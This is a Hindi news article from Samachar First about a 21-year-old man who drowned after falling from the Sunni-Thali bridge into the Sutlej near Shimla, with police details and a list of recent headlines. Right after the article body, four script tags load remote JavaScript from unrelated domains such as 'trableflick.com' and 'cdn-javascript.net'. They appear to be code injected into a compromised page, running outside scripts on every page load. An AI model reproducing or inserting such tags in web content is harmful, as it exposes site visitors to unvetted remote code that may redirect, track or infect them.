शिमलाः संतुलन बिगड़ जाने से युवक की नदी में गिरकर मौत

<p>नगर पंचायत सुन्नी में सतलुज नदी बने सुन्नी-थली पुल पर संतुलन बिगड़ जाने से 21साल युवक की नदी में गिर कर मृत्यु हो गई। बीते कल दोपहर करीब 11 बजे जब युवक पुल पर से गुजर रहा था उस समय संतुलन बिगड़ जाने के कारण वह नदी में गिर पड़ा। पुल के नजदीक सीवरेज प्लांट पर काम कर रहे कर्मचारियों ने युवक को गिरते देखा तो वह तुरंत उसे बचाने के लिए नदी के पास पहुंचे और युवक को नदी से बाहर निकालकर नागरिक अस्पताल सुन्नी पहुंचाया मगर वहां पर तैनात चिकित्सा अधिकारियों ने उसे मृत घोषित कर दिया।</p>

<p>हादसे की सूचना मिलते ही पुलिस सहायता कक्ष तत्तापानी के प्रभारी एएसआई साहब सिंह अपने दल सहित मौके पर पहुंचे और शव को कब्जे में लेकर तहकीकात शुरू कर दी। मृतक की पहचान आदित्य भण्डारी उम्र 21 साल पुत्र स्व गुलाब सिंह निवासी शिमला के रूप में हुई है। एएसआई साहब सिंह प्रभारी पुलिस सहायता कक्ष तत्तापानी ने मामले की पुष्टि करते हुए बताया कि पोस्टमार्टम करवाकर शव को परिजनों के हवाले कर दिया गया है। सीआरपीसी की धारा 174 के तहत मामला दर्ज़ करके जांच शुरु कर दी गयी है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1581996379205″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

इंडी गठबंधन के लोग ईवीएम को लेकर दुष्प्रचार करते हैं: राजीव भारद्वाज

इंडी गठबंधन के लोग ईवीएम को लेकर दुष्प्रचार करते हैं : राजीव भारद्वाज कांग्रेस के…

22 mins ago

प्राकृतिक आपदा प्रबन्धन पर पांच दिवसीय कार्यशाला आरम्भ

हिमाचल प्रदेश राज्य आपदा प्रबंधन प्राधिकरण (एसडीएमए) द्वारा राज्य, स्वास्थ्य और परिवार कल्याण संस्थान के…

17 hours ago

एसीएस तथा एडीजीपी ने जिला प्रशासन के साथ की बैठक

धर्मशाला: राष्ट्रपति द्रोपदी मुर्मु के धर्मशाला प्रवास को लेकर सुरक्षा तथा अन्य तैयारियों की समीक्षा…

17 hours ago

भारतीय जनता युवा मोर्चा ने शुरू किया पत्रक वितरण अभियान

प्रदेश में लोकसभा चुनाव में भाजपा की जीत सुनिश्चित करने के लिए भारतीय जनता युवा…

17 hours ago

चुनाव आयोग का कांग्रेस के साथ सौतेला व्यवहार: जगत सिंह नेगी

हिमाचल प्रदेश के बागवानी एवं राजस्व मंत्री जगत सिंह नेगी ने चुनाव आयोग पर कांग्रेस…

17 hours ago

पंडित संतराम की विरासत को सुधीर ने कलंकित किया : कांग्रेस

धर्मशाला से कांग्रेस के वरिष्ठ नेता विजयइंद्र कर्ण और पूर्व मेयर देवेंद्र जग्गी ने कहा…

19 hours ago